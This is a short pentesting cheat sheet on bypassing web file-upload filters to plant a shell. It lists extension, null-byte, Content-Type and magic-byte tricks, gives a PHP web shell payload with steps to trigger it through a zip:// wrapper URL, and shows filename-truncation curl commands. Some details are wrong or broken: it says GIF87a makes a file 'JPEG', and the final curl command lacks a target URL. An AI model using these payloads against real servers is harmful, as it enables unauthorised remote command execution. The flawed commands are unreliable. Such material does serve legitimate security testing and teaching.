Bypass Filters

[1] changing file extension Common extensions to bypass PHP restrictions

  • png, jpg, phtml, phpt, php3, php4, php5, php6

#Example: shell.png.php

Common extensions to bypass Perl restrictions

  • .pl, .pm, .cgi, .lib

Common extensions to bypass JSP restrictions

  • .jsp, .jspx, .jsw, .jsv, and .jspf

Common extensions to bypass Cold Fusion restrictions

  • .cfm, .cfml, .cfc, .dbm

[2] Another method of changing extensions is by appending # after the original extension and then adding the required extension. #Example: shell.php#.png

[3] Another method of changing extensions is by using null bytes #Example shell.php%00.gif

changing content type and keeping file extension to fit the allowed extensions Example: intercept a burp request and change content type to this if your payload is in php

codecontent-type:x-text/php
filename=shell.png

changing the magic number

root@kali: hexyl -n 256 file.php
root@kali: nano file.php

Append GIF87a to the first line of the file and it will become JPEG

Using php zip filters We use PHP zip filters when the file's name that we upload to get RCE changes or is controlled by the web application. This means that if you upload a file named [shell] the web application will rename it

to any arbitrary name therefore we will not be able to call the RCE shell since the name of the file changes. #[Lets] take the below payload

<?php echo system($_GET['cmd']); ?>

First step would be to store this php payload in a php file such as [cmd.php] Next step to zip the php file into a zip file

zip shell.zip cmd.php

Then you can use [curl] or the browser to upload the file. Last step it to trigger the shell is done by navigating to the uploads path on the target domain and locating the file. For example, for the above shell we can browse to the below URL to trigger the shell

http://domain.com/?file=zip://uploads/{filename}%23cmd&cmd=[command]

Replace [filename] with the name you have found. The [%23] is the [#] character and [cmd] is the parameter through which the command will be executed. Using File Name Truncation File name truncation is a bypass method where the last four characters of the file get truncated. #[for] #[example] A file named [upload.php.png] won't get uploaded if the server filters for extensions such as [png]. One way to bypass this is to use long names enough to make the server omit the last four characters that happen to be [.png] so the final file name would be

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php

To test this, you can create a variable such as [$URL] as the below shows

URL=$(python -c 'print "http://domain.com/upload" + "A"*232 + ".php.png"')

and use the [$URL] in a curl command to see the server response

curl -i -k -X $'POST' -H $'Content-Type: application/x-www-form-urlencoded' --data-binary 'url=$URL'

Last updated